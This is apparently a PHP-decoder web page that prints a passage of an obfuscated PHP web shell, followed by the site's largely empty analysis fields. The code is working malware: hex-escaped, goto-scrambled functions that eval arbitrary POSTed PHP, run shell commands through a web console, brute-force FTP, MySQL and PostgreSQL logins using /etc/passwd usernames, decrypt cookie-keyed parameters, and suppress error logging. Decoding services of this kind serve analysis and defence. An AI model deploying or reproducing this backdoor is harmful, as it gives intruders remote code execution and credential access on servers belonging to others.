47\76\x3c\151\x6e\x70\x75\164\x20\x63\154\x61\163\163\x3d\42\164\157\x6f\x6c\163\111\x6e\x70\42\40\x74\x79\160\145\75\164\145\x78\x74\40\x6e\141\x6d\x65\x3d\160\141\x72\141\155\76\x3c\x69\156\x70\165\x74\x20\x74\x79\160\x65\75\x73\165\x62\155\151\x74\x20\166\141\154\x75\x65\75\x22\163\x75\x62\x6d\151\164\x22\76\74\57\x66\x6f\162\155\76\x3c\142\162\76\74\163\160\x61\156\x3e\120\x6f\163\151\x78\137\147\145\164\x70\x77\x75\x69\144\40\x28\x22\122\x65\x61\x64\42\x20\x2f\x65\x74\143\57\x70\x61\163\163\167\x64\51\74\x2f\x73\x70\x61\x6e\76\x3c\x74\x61\142\x6c\145\x3e\74\x66\x6f\x72\155\x20\x6f\x6e\163\165\x62\x6d\151\x74\75\x27\147\50\156\165\x6c\x6c\x2c\156\x75\x6c\x6c\54\x22\65\x22\54\x74\150\x69\x73\x2e\x70\x61\x72\141\x6d\61\56\166\141\x6c\165\145\x2c\164\x68\151\163\x2e\160\141\162\141\x6d\x32\56\x76\141\x6c\x75\145\51\73\x72\x65\x74\165\x72\156\40\146\141\x6c\163\145\x3b\x27\x3e\74\x74\x72\x3e\x3c\x74\x64\76\x46\x72\x6f\x6d\x3c\57\x74\x64\76\74\164\144\x3e\x3c\151\x6e\x70\165\164\40\x74\171\x70\x65\75\x74\x65\170\x74\x20\156\x61\155\145\75\160\x61\162\x61\x6d\61\40\166\141\154\x75\145\x3d\x30\x3e\x3c\x2f\164\144\x3e\x3c\x2f\x74\x72\76\74\164\x72\76\74\x74\144\76\x54\157\74\57\164\144\76\x3c\x74\x64\76\x3c\151\x6e\x70\165\x74\40\164\171\x70\145\x3d\164\x65\170\164\x20\156\141\x6d\145\75\160\x61\162\141\x6d\62\40\x76\141\154\x75\x65\x3d\61\x30\x30\60\x3e\x3c\x2f\x74\144\76\x3c\x2f\164\x72\76\74\57\164\x61\x62\x6c\x65\76\74\x69\156\x70\x75\x74\x20\x74\x79\x70\145\75\x73\165\x62\155\x69\x74\40\x76\141\154\x75\x65\75\42\163\x75\x62\x6d\x69\164\x22\x3e\74\x2f\146\x6f\x72\x6d\x3e\74\x62\162\76\74\x62\x72\x3e\x3c\163\x70\141\156\76\x49\x6d\141\160\x5f\x6f\160\145\156\x20\x28\162\x65\x61\144\40\x66\151\x6c\145\51\x3c\x2f\163\x70\x61\x6e\76\74\x66\157\x72\155\40\x6f\x6e\163\165\142\155\x69\164\75\x27\147\50\x6e\165\154\x6c\x2c\x6e\x75\x6c\154\54\42\66\42\54\164\x68\x69\x73\x2e\x70\141\x72\141\155\56\x76\x61\154\x75\x65\51\x3b\x72\145\164\x75\x72\x6e\40\x66\141\154\x73\x65\x3b\47\76\x3c\x69\156\x70\165\164\40\x74\x79\x70\145\x3d\x74\145\x78\x74\40\156\x61\155\x65\75\160\x61\162\141\155\x3e\74\x69\156\x70\x75\x74\40\164\x79\160\x65\x3d\x73\x75\142\155\x69\x74\40\x76\141\x6c\x75\x65\x3d\42\x73\165\x62\x6d\x69\164\x22\76\74\x2f\x66\157\x72\x6d\x3e"; if ($temp) { echo "\74\x70\162\145\x20\143\154\141\x73\163\x3d\42\155\x6c\x31\42\x20\x73\164\171\154\145\x3d\42\155\x61\x72\x67\151\156\55\164\x6f\x70\x3a\x35\160\x78\x22\x20\151\x64\x3d\42\x4f\165\x74\160\x75\164\42\76" . $temp . "\74\x2f\x70\162\145\76"; } echo "\74\x2f\x64\x69\x76\x3e"; hardFooter(); } goto W_qyb; YQzoR: function viewSize($s) { if ($s >= 1073741824) { return sprintf("\45\61\x2e\x32\146", $s / 1073741824) . "\40\x47\x42"; } elseif ($s >= 1048576) { return sprintf("\x25\x31\x2e\62\x66", $s / 1048576) . "\40\115\102"; } elseif ($s >= 1024) { return sprintf("\x25\x31\56\62\146", $s / 1024) . "\x20\113\x42"; } else { return $s . "\x20\x42"; } } goto XXfsY; WMTEU: function actionPhp() { if (isset($_POST["\141\x6a\141\x78"])) { $_COOKIE[md5($_SERVER["\x48\x54\x54\x50\x5f\110\x4f\123\x54"]) . "\x61\152\x61\170"] = true; ob_start(); eval($_POST["\160\x31"]); $temp = "\x64\157\143\165\155\x65\156\x74\56\x67\145\x74\105\154\x65\155\145\156\164\x42\171\x49\x64\x28\x27\120\x68\160\x4f\x75\164\x70\x75\164\x27\51\56\163\x74\x79\x6c\145\x2e\x64\151\163\x70\x6c\x61\171\75\47\47\x3b\144\x6f\143\x75\155\x65\x6e\164\56\147\x65\164\x45\154\145\x6d\145\156\x74\x42\171\x49\144\50\x27\x50\x68\x70\117\165\164\x70\x75\x74\47\x29\x2e\151\156\156\145\x72\110\x54\x4d\114\75\x27" . addcslashes(htmlspecialchars(ob_get_clean()), "\xa\xd\11\134\47\0") . "\x27\x3b\12"; echo strlen($temp), "\12", $temp; die; } hardHeader(); if (isset($_POST["\160\62"]) && $_POST["\160\62"] == "\x69\x6e\146\157") { echo "\74\150\61\x3e\120\x48\120\40\x69\156\146\157\74\57\x68\x31\x3e\74\144\x69\x76\40\x63\154\141\163\x73\x3d\x63\157\x6e\164\145\x6e\164\x3e"; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace("\41\142\x6f\144\x79\40\x7b\x2e\52\x7d\41\x6d\163\151\125", '', $tmp); $tmp = preg_replace("\41\x61\72\134\167\x2b\x20\x7b\56\x2a\175\41\155\x73\x69\x55", '', $tmp); $tmp = preg_replace("\x21\x68\61\41\x6d\x73\151\125", "\150\x32", $tmp); $tmp = preg_replace("\x21\164\144\54\40\x74\x68\40\173\50\56\x2a\x29\175\x21\x6d\x73\151\x55", "\56\x65\54\40\x2e\x76\x2c\x20\x2e\x68\54\x20\x2e\x68\x20\x74\150\40\173\44\61\175", $tmp); $tmp = preg_replace("\41\142\157\144\x79\54\x20\x74\144\x2c\40\x74\x68\x2c\40\150\x32\x2c\x20\150\x32\40\173\x2e\x2a\175\x21\155\x73\x69\125", '', $tmp); echo $tmp; echo "\x3c\57\x64\151\166\76\74\x62\x72\x3e"; } if (empty($_POST["\x61\x6a\141\170"]) && !empty($_POST["\x70\x31"])) { $_COOKIE[md5($_SERVER["\110\124\x54\x50\x5f\110\117\x53\124"]) . "\x61\152\x61\170"] = false; } echo "\x3c\150\61\x3e\x45\170\145\143\x75\x74\151\x6f\156\40\120\x48\120\x2d\143\157\x64\x65\x3c\x2f\x68\x31\x3e\x3c\144\151\166\x20\x63\154\x61\163\163\75\x63\157\x6e\164\x65\x6e\164\76\74\146\157\x72\155\40\x6e\141\x6d\145\x3d\160\146\40\x6d\145\164\150\x6f\144\75\x70\157\x73\164\x20\157\156\x73\165\x62\155\151\x74\x3d\x22\151\146\x28\164\x68\x69\163\x2e\x61\x6a\x61\x78\56\143\x68\x65\x63\153\145\x64\51\173\x61\x28\156\165\x6c\154\x2c\x6e\x75\154\x6c\x2c\x74\x68\151\163\56\143\x6f\144\145\x2e\166\x61\x6c\x75\x65\x29\73\175\x65\x6c\x73\145\173\x67\x28\x6e\165\x6c\x6c\54\156\x75\x6c\154\x2c\164\150\x69\x73\56\143\157\x64\145\56\166\141\154\x75\145\x2c\47\47\x29\x3b\175\x72\145\x74\165\162\156\x20\x66\141\154\x73\145\x3b\x22\76\x3c\164\145\170\x74\x61\x72\x65\x61\40\156\141\x6d\145\75\143\x6f\144\145\x20\143\154\141\x73\163\75\x62\151\x67\x61\162\145\x61\40\151\144\x3d\x50\x68\x70\x43\157\x64\145\x3e" . (!empty($_POST["\160\61"]) ? htmlspecialchars($_POST["\x70\61"]) : '') . "\74\x2f\164\x65\170\164\141\x72\x65\141\x3e\74\x69\156\160\165\164\40\x74\x79\160\x65\75\x73\x75\142\x6d\151\x74\40\166\141\x6c\x75\145\x3d\105\166\141\154\40\x73\164\x79\154\145\75\42\155\141\162\147\151\x6e\55\164\157\x70\x3a\x35\x70\x78\42\x3e"; echo "\x20\74\151\156\x70\x75\x74\x20\x74\x79\x70\145\75\143\x68\x65\143\x6b\142\157\170\x20\x6e\x61\155\145\x3d\141\x6a\x61\x78\x20\x76\x61\154\165\x65\x3d\61\40" . ($_COOKIE[md5($_SERVER["\x48\x54\124\x50\x5f\x48\117\x53\124"]) . "\x61\x6a\x61\170"] ? "\143\x68\x65\143\x6b\x65\144" : '') . "\76\40\163\145\156\144\40\165\163\x69\x6e\x67\x20\x41\x4a\101\x58\x3c\x2f\146\x6f\x72\155\76\74\160\162\x65\40\151\144\x3d\120\150\x70\x4f\x75\x74\160\x75\164\40\x73\164\x79\154\x65\75\42" . (empty($_POST["\x70\61"]) ? "\x64\x69\163\160\x6c\x61\x79\72\x6e\157\156\x65\x3b" : '') . "\x6d\x61\x72\147\151\156\x2d\x74\x6f\160\72\x35\x70\170\x3b\x22\40\143\x6c\141\163\x73\75\155\x6c\x31\76"; if (!empty($_POST["\160\x31"])) { ob_start(); eval($_POST["\x70\61"]); echo htmlspecialchars(ob_get_clean()); } echo "\x3c\x2f\160\x72\145\x3e\74\57\144\151\x76\x3e"; hardFooter(); } goto KOaKG; hJVFy: if (!isset($_POST["\156\x65"])) { if (isset($_POST["\x61"])) { $_POST["\141"] = iconv("\x75\x74\x66\x2d\70", $_POST["\143\x68\141\x72\x73\x65\164"], decrypt($_POST["\141"], $_COOKIE[md5($_SERVER["\110\124\x54\x50\x5f\x48\x4f\123\x54"]) . "\x6b\145\x79"])); } if (isset($_POST["\143"])) { $_POST["\x63"] = iconv("\165\x74\146\55\70", $_POST["\x63\x68\141\x72\163\145\164"], decrypt($_POST["\143"], $_COOKIE[md5($_SERVER["\110\x54\x54\x50\x5f\x48\117\123\x54"]) . "\x6b\x65\171"])); } if (isset($_POST["\x70\x31"])) { $_POST["\160\x31"] = iconv("\165\164\146\x2d\70", $_POST["\143\150\x61\162\x73\x65\x74"], decrypt($_POST["\160\x31"], $_COOKIE[md5($_SERVER["\x48\124\124\120\x5f\x48\117\123\x54"]) . "\153\x65\171"])); } if (isset($_POST["\160\62"])) { $_POST["\x70\x32"] = iconv("\x75\164\146\x2d\70", $_POST["\x63\x68\x61\162\163\145\x74"], decrypt($_POST["\x70\x32"], $_COOKIE[md5($_SERVER["\110\x54\x54\120\137\x48\x4f\x53\x54"]) . "\153\145\171"])); } if (isset($_POST["\160\x33"])) { $_POST["\160\x33"] = iconv("\165\164\146\55\x38", $_POST["\x63\x68\141\x72\163\x65\164"], decrypt($_POST["\x70\63"], $_COOKIE[md5($_SERVER["\x48\124\124\x50\137\110\117\123\124"]) . "\x6b\145\171"])); } } goto nbMDY; ZuuFx: $safe_mode = @ini_get("\163\141\146\145\x5f\155\x6f\x64\x65"); goto AH6j_; p2UEO: @ini_set("\145\x72\x72\x6f\x72\137\154\157\147", NULL); goto r2c06; XXfsY: function perms($p) { if (($p & 49152) == 49152) { $i = "\x73"; } elseif (($p & 40960) == 40960) { $i = "\154"; } elseif (($p & 32768) == 32768) { $i = "\x2d"; } elseif (($p & 24576) == 24576) { $i = "\x62"; } elseif (($p & 16384) == 16384) { $i = "\x64"; } elseif (($p & 8192) == 8192) { $i = "\143"; } elseif (($p & 4096) == 4096) { $i = "\160"; } else { $i = "\x75"; } $i .= $p & 256 ? "\162" : "\55"; $i .= $p & 128 ? "\167" : "\55"; $i .= $p & 64 ? $p & 2048 ? "\x73" : "\x78" : ($p & 2048 ? "\x53" : "\x2d"); $i .= $p & 32 ? "\162" : "\x2d"; $i .= $p & 16 ? "\167" : "\55"; $i .= $p & 8 ? $p & 1024 ? "\163" : "\x78" : ($p & 1024 ? "\x53" : "\55"); $i .= $p & 4 ? "\162" : "\x2d"; $i .= $p & 2 ? "\x77" : "\55"; $i .= $p & 1 ? $p & 512 ? "\164" : "\170" : ($p & 512 ? "\x54" : "\x2d"); return $i; } goto Y5ImI; Y2Zvy: function actionConsole() { if (!empty($_POST["\160\61"]) && !empty($_POST["\160\62"])) { prototype(md5($_SERVER["\110\124\x54\x50\137\x48\x4f\x53\x54"]) . "\163\164\x64\x65\162\162\x5f\164\x6f\137\157\165\x74", true); $_POST["\160\x31"] .= "\40\62\76\x26\61"; } elseif (!empty($_POST["\x70\x31"])) { prototype(md5($_SERVER["\110\x54\x54\x50\x5f\110\117\123\x54"]) . "\x73\164\144\145\x72\162\137\x74\x6f\137\x6f\165\164", 0); } if (isset($_POST["\x61\152\141\170"])) { prototype(md5($_SERVER["\x48\x54\x54\x50\x5f\x48\117\x53\124"]) . "\x61\152\x61\170", true); ob_start(); echo "\x64\x2e\x63\x66\x2e\x63\155\x64\56\166\x61\x6c\165\x65\x3d\47\47\x3b\xa"; $temp = @iconv($_POST["\x63\150\141\162\x73\145\164"], "\x55\x54\106\55\70", addcslashes("\xa\x24\x20" . $_POST["\160\x31"] . "\xa" . ex($_POST["\x70\61"]), "\xa\xd\x9\134\x27\x0")); if (preg_match("\x21\56\52\x63\144\x5c\x73\53\x28\133\x5e\x3b\x5d\53\x29\44\x21", $_POST["\160\61"], $match)) { if (@chdir($match[1])) { $GLOBALS["\143\x77\x64"] = @getcwd(); echo "\143\x5f\x3d\47" . $GLOBALS["\x63\x77\144"] . "\47\73"; } } echo "\144\x2e\x63\x66\x2e\x6f\165\164\160\165\x74\56\166\x61\154\x75\145\x2b\75\x27" . $temp . "\x27\73"; echo "\144\56\143\146\x2e\157\165\x74\x70\165\164\56\163\x63\162\157\x6c\154\124\157\x70\40\x3d\40\x64\x2e\x63\146\56\x6f\165\x74\160\165\164\56\x73\x63\x72\157\x6c\154\x48\x65\x69\x67\x68\x74\73"; $temp = ob_get_clean(); echo strlen($temp), "\xa", $temp; die; } if (empty($_POST["\141\x6a\141\x78"]) && !empty($_POST["\160\61"])) { prototype(md5($_SERVER["\110\124\x54\x50\137\110\117\123\x54"]) . "\141\152\x61\170", 0); } hardHeader(); echo "\74\x73\x63\162\x69\x70\x74\76\xa\151\x66\x28\x77\151\156\x64\x6f\167\x2e\105\166\x65\x6e\164\x29\x20\167\x69\156\144\157\167\56\x63\141\160\x74\x75\162\x65\x45\166\x65\x6e\164\163\50\105\x76\x65\156\164\x2e\x4b\105\131\x44\x4f\127\116\51\73\12\166\x61\x72\40\143\x6d\144\163\x20\75\40\156\145\x77\x20\101\162\x72\141\x79\x28\x27\x27\51\73\xa\x76\x61\x72\40\x63\x75\162\x20\75\40\x30\x3b\12\146\x75\156\x63\164\x69\157\156\40\x6b\160\x28\x65\x29\x20\173\xa\x9\x76\x61\162\x20\x6e\40\75\40\50\x77\x69\x6e\x64\157\167\x2e\x45\166\145\156\x74\51\40\x3f\x20\145\x2e\x77\150\x69\x63\150\x20\72\40\x65\x2e\x6b\145\171\x43\x6f\144\145\x3b\12\11\151\146\50\156\40\75\x3d\x20\63\x38\x29\x20\173\xa\11\11\x63\165\x72\x2d\55\x3b\12\x9\x9\151\146\x28\143\165\x72\76\75\x30\x29\12\11\x9\11\144\x6f\x63\165\x6d\145\x6e\x74\56\143\146\56\143\x6d\x64\56\166\141\x6c\165\x65\40\75\40\x63\x6d\x64\x73\x5b\x63\165\x72\135\73\12\x9\11\x65\154\x73\145\12\x9\x9\11\x63\165\162\x2b\53\x3b\12\11\x7d\40\x65\x6c\x73\x65\x20\x69\146\50\x6e\x20\x3d\75\x20\64\60\x29\40\173\xa\x9\11\x63\165\x72\x2b\x2b\x3b\12\11\11\x69\x66\50\143\x75\x72\x20\x3c\x20\143\155\144\163\x2e\x6c\x65\x6e\x67\164\x68\51\12\11\11\x9\x64\x6f\143\165\x6d\145\x6e\164\56\143\x66\x2e\x63\155\144\x2e\x76\141\154\165\x65\40\x3d\40\143\155\144\163\x5b\x63\165\162\x5d\x3b\xa\11\x9\x65\x6c\163\x65\xa\11\x9\11\143\x75\162\x2d\55\73\12\x9\x7d\12\175\xa\146\x75\156\x63\164\x69\157\x6e\x20\x61\x64\144\x28\x63\155\x64\51\40\x7b\12\11\143\x6d\144\163\x2e\x70\x6f\x70\x28\51\x3b\12\x9\x63\155\144\x73\x2e\160\x75\163\150\50\143\155\x64\x29\73\xa\11\143\155\144\x73\56\x70\x75\163\x68\x28\x27\x27\x29\x3b\xa\11\x63\x75\x72\40\75\x20\143\155\144\x73\x2e\154\145\x6e\x67\164\x68\55\x31\x3b\xa\x7d\12\74\x2f\x73\143\x72\151\160\164\76"; echo "\74\x68\x31\x3e\x43\x6f\156\163\157\x6c\145\x3c\x2f\x68\61\x3e\74\144\151\x76\x20\x63\x6c\141\x73\x73\75\143\x6f\x6e\164\145\156\x74\x3e\74\x66\157\162\155\x20\x6e\x61\x6d\145\75\x63\146\40\x6f\156\x73\165\x62\155\151\164\x3d\x22\151\146\50\x64\x2e\143\x66\x2e\x63\x6d\x64\56\x76\x61\x6c\165\145\75\x3d\x27\143\x6c\x65\141\162\x27\x29\173\x64\56\143\146\56\x6f\165\x74\160\165\x74\56\x76\141\x6c\x75\x65\x3d\x27\47\x3b\144\x2e\x63\x66\x2e\x63\155\144\x2e\x76\141\x6c\165\145\x3d\47\x27\x3b\x72\145\x74\x75\162\x6e\40\x66\x61\x6c\163\145\x3b\x7d\141\144\x64\50\164\150\151\163\56\x63\x6d\144\x2e\166\141\154\165\145\51\x3b\151\146\50\x74\x68\x69\x73\56\141\152\141\x78\56\143\150\x65\x63\153\x65\x64\51\x7b\141\50\x6e\x75\x6c\x6c\x2c\x6e\165\x6c\x6c\54\x74\150\x69\x73\x2e\143\155\144\x2e\x76\141\x6c\x75\x65\x2c\x74\x68\151\163\56\163\150\x6f\x77\x5f\x65\162\162\x6f\162\163\56\x63\x68\145\143\x6b\145\144\77\x31\72\x27\x27\51\x3b\175\x65\x6c\163\145\x7b\x67\x28\x6e\165\x6c\x6c\54\156\x75\154\x6c\54\x74\x68\x69\x73\56\x63\x6d\x64\x2e\x76\x61\x6c\x75\x65\54\164\x68\151\x73\x2e\x73\x68\157\x77\137\x65\x72\162\x6f\162\x73\x2e\143\150\145\x63\153\145\144\77\61\72\47\x27\51\73\x7d\x20\x72\145\164\165\x72\156\x20\x66\x61\x6c\x73\145\x3b\42\76\74\x6c\141\142\145\x6c\76\x3c\x73\x65\x6c\145\x63\164\40\156\x61\x6d\x65\x3d\x61\x6c\x69\141\163\x3e"; foreach ($GLOBALS["\x61\x6c\x69\141\163\145\163"] as $n => $v) { if ($v == '') { echo "\x3c\157\x70\164\147\162\x6f\165\x70\40\154\x61\x62\x65\154\x3d\x22\55" . htmlspecialchars($n) . "\x2d\42\76\74\57\157\160\x74\147\162\x6f\165\x70\x3e"; continue; } echo "\x3c\x6f\160\164\x69\x6f\156\x20\x76\141\x6c\165\x65\75\42" . htmlspecialchars($v) . "\42\76" . $n . "\74\x2f\157\160\164\x69\x6f\156\76"; } echo "\74\57\163\145\154\145\x63\164\76\74\57\x6c\x61\142\145\154\x3e\74\x69\x6e\x70\165\164\x20\164\x79\160\145\x3d\142\165\x74\164\157\156\40\157\156\x63\154\x69\x63\x6b\x3d\x22\x61\144\x64\50\x64\x2e\x63\146\56\x61\x6c\151\141\163\x2e\x76\x61\x6c\x75\x65\x29\73\151\x66\50\x64\x2e\x63\x66\56\x61\x6a\x61\x78\x2e\x63\150\x65\143\x6b\145\144\51\173\x61\50\156\165\x6c\154\x2c\x6e\165\154\x6c\x2c\x64\x2e\143\x66\56\x61\x6c\151\141\163\x2e\x76\x61\x6c\165\x65\x2c\144\56\x63\x66\x2e\x73\150\x6f\167\x5f\x65\x72\x72\157\x72\163\56\x63\150\x65\143\153\145\x64\x3f\x31\72\x27\47\x29\73\x7d\x65\154\163\145\173\x67\x28\x6e\x75\x6c\154\54\x6e\x75\x6c\154\54\144\56\143\x66\56\141\154\x69\x61\x73\56\x76\x61\x6c\165\x65\54\x64\56\x63\146\x2e\x73\150\157\167\137\145\x72\x72\x6f\162\x73\x2e\x63\150\x65\143\x6b\145\144\x3f\x31\x3a\47\47\x29\73\175\x22\40\166\141\x6c\x75\x65\x3d\x22\x73\x75\x62\x6d\151\x74\42\76\x20\74\x6e\x6f\142\x72\x3e\x3c\151\x6e\160\x75\x74\x20\x74\x79\x70\145\75\143\x68\145\x63\153\142\157\x78\x20\x6e\x61\155\x65\x3d\x61\152\141\170\40\x76\x61\154\x75\145\x3d\61\x20" . (@$_COOKIE[md5($_SERVER["\110\124\124\x50\x5f\x48\117\x53\124"]) . "\x61\x6a\141\x78"] ? "\x63\150\x65\143\153\x65\144" : '') . "\x3e\x20\x73\x65\x6e\144\x20\165\163\151\156\x67\40\x41\x4a\101\x58\40\x3c\151\x6e\x70\165\164\40\164\x79\x70\x65\75\x63\x68\145\x63\153\142\x6f\170\x20\156\x61\155\145\x3d\163\x68\x6f\x77\x5f\145\162\162\157\162\x73\40\166\141\x6c\x75\145\75\61\x20" . (!empty($_POST["\160\62"]) || $_COOKIE[md5($_SERVER["\110\124\124\x50\137\110\x4f\x53\x54"]) . "\163\x74\144\x65\162\162\137\x74\157\137\157\x75\164"] ? "\143\150\145\x63\153\145\x64" : '') . "\76\40\162\x65\x64\151\x72\x65\x63\x74\x20\x73\164\x64\145\x72\x72\x20\x74\x6f\40\163\164\144\157\x75\164\40\x28\62\76\x26\61\x29\74\57\x6e\157\142\162\x3e\74\142\x72\57\x3e\x3c\x74\x65\x78\x74\141\162\145\x61\x20\143\x6c\x61\x73\x73\x3d\142\x69\147\141\x72\145\141\40\156\141\x6d\145\x3d\157\x75\164\x70\165\x74\x20\x73\x74\171\x6c\145\75\42\x62\x6f\x72\x64\x65\162\x2d\x62\157\x74\164\157\155\72\60\73\155\x61\x72\147\x69\156\x2d\x74\x6f\x70\x3a\x35\x70\x78\x3b\x22\40\x72\145\x61\144\157\156\154\x79\x3e"; if (!empty($_POST["\160\61"])) { echo htmlspecialchars("\x24\x20" . $_POST["\x70\x31"] . "\12" . ex($_POST["\x70\x31"])); } echo "\74\57\x74\x65\x78\x74\141\x72\145\141\x3e\74\x74\x61\x62\x6c\145\x20\163\164\171\154\x65\x3d\42\x62\x6f\x72\x64\145\x72\x3a\x31\x70\x78\40\163\157\154\151\x64\40\43\60\x36\60\x61\x31\x30\x3b\x62\x61\143\153\147\x72\x6f\x75\x6e\144\55\x63\157\154\x6f\162\72\43\x30\x36\60\141\x31\60\x3b\x62\157\162\144\x65\162\x2d\164\157\160\72\60\x70\170\x3b\x22\x20\143\x65\154\154\160\141\x64\x64\151\x6e\147\x3d\60\40\x63\x65\154\154\x73\x70\141\x63\151\156\x67\x3d\x30\40\167\151\144\164\150\x3d\42\61\60\60\x25\42\76\74\x74\x72\76\x3c\x74\144\40\163\164\x79\154\x65\75\x22\x70\141\x64\x64\151\156\x67\x2d\154\x65\146\164\x3a\64\x70\170\73\40\x77\x69\x64\x74\150\x3a\61\63\160\x78\73\42\76\44\x3c\57\x74\x64\76\74\x74\x64\76\74\151\156\160\165\x74\40\164\171\x70\145\x3d\164\x65\170\x74\40\156\x61\155\145\75\143\x6d\144\40\163\x74\171\x6c\x65\x3d\x22\142\157\x72\144\145\x72\x3a\60\x70\170\73\x77\x69\144\x74\x68\x3a\x31\x30\x30\45\x3b\42\x20\x6f\x6e\153\145\171\144\157\x77\156\x3d\x22\153\x70\x28\145\x76\145\156\164\51\73\42\x3e\74\x2f\164\144\x3e\x3c\57\x74\x72\x3e\74\x2f\164\x61\x62\154\145\x3e"; echo "\x3c\x2f\x66\x6f\162\x6d\76\74\57\x64\151\166\76\74\163\143\162\x69\x70\164\x3e\144\56\x63\146\x2e\x63\x6d\144\56\146\x6f\x63\165\163\50\x29\73\74\x2f\163\143\x72\151\160\x74\76"; hardFooter(); } goto WMTEU; G8cmK: function actionBruteforce() { hardHeader(); if (isset($_POST["\x70\162\157\x74\x6f"])) { echo "\74\x68\61\x3e\122\145\x73\165\x6c\x74\163\x3c\57\150\x31\76\x3c\144\151\166\40\143\x6c\141\x73\163\75\143\x6f\x6e\164\x65\x6e\164\x3e\x3c\x73\x70\x61\x6e\x3e\124\171\160\145\x3a\x3c\57\x73\x70\141\156\76\x20" . htmlspecialchars($_POST["\160\x72\x6f\x74\157"]) . "\40\x3c\x73\x70\x61\156\x3e\123\145\162\166\x65\162\x3a\x3c\x2f\163\x70\x61\156\76\x20" . htmlspecialchars($_POST["\x73\x65\162\166\x65\162"]) . "\74\142\x72\76"; if ($_POST["\x70\x72\x6f\164\x6f"] == "\x66\x74\160") { function bruteForce($ip, $port, $login, $pass) { $fp = @ftp_connect($ip, $port ? $port : 21); if (!$fp) { return false; } $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif ($_POST["\160\162\x6f\x74\157"] == "\x6d\171\163\x71\154") { function bruteForce($ip, $port, $login, $pass) { $res = @mysql_connect($ip . "\72" . ($port ? $port : 3306), $login, $pass); @mysql_close($res); return $res; } } elseif ($_POST["\x70\x72\x6f\164\157"] == "\x70\147\x73\x71\x6c") { function bruteForce($ip, $port, $login, $pass) { $str = "\150\157\163\164\x3d\x27" . $ip . "\x27\x20\160\157\x72\x74\x3d\x27" . $port . "\47\x20\165\x73\x65\x72\75\x27" . $login . "\47\x20\160\141\163\163\x77\157\x72\144\75\x27" . $pass . "\47\40\144\142\x6e\141\155\145\x3d\x70\x6f\163\164\147\x72\x65\163"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode("\72", $_POST["\x73\145\x72\166\145\162"]); if ($_POST["\x74\x79\x70\x65"] == 1) { $temp = @file("\x2f\145\x74\x63\x2f\160\x61\x73\x73\x77\x64"); if (is_array($temp)) { foreach ($temp as $line) { $line = explode("\72", $line); ++$attempts; if (bruteForce(@$server[0], @$server[1], $line[0], $line[0])) { $success++; echo "\74\x62\76" . htmlspecialchars($line[0]) . "\74\57\142\x3e\x3a" . htmlspecialchars($line[0]) . "\x3c\142\162\76"; } if (@$_POST["\x72\145\x76\145\x72\x73\145"]) { $tmp = ''; for ($i = strlen($line[0]) - 1; $i >= 0; --$i) { $tmp .= $line[0][$i]; } ++$attempts; if (bruteForce(@$server[0], @$server[1], $line[0], $tmp)) { $success++; echo "\x3c\142\76" . htmlspecialchars($line[0]) . "\x3c\57\x62\76\72" . htmlspecialchars($tmp); } } } } } elseif ($_POST["\x74\171\160\145"] == 2) { $temp = @file($_POST["\x64\151\143\x74"]); if (is_array($temp)) { foreach ($temp as $line) { $line = trim($line); ++$attempts; if (bruteForce($server[0], @$server[1], $_POST["\154\x6f\147\151\156"], $line)) { $success++; echo "\x3c\142\76" . htmlspecialchars($_POST["\x6c\157\147\151\x6e"]) . "\x3c\x2f\142\x3e\x3a" . htmlspecialchars($line) . "\x3c\x62\162\x3e"; } } } } echo "\x3c\x73\160\141\156\76\101\164\x74\x65\155\160\164\x73\72\x3c\x2f\163\x70\141\x6e\76\x20{$attempts}\x20\74\x73\x70\141\156\x3e\x53\x75\x63\x63\x65\163\163\72\x3c\x2f\x73\x70\141\x6e\76\x20{$success}\74\57\x64\151\x76\x3e\74\142\x72\x3e"; } echo

Function Calls

None

Variables

None

Stats

MD5	7fa0949dbda9e1ab8abadbb7476f9897
Eval Count	0
Decode Time	236 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats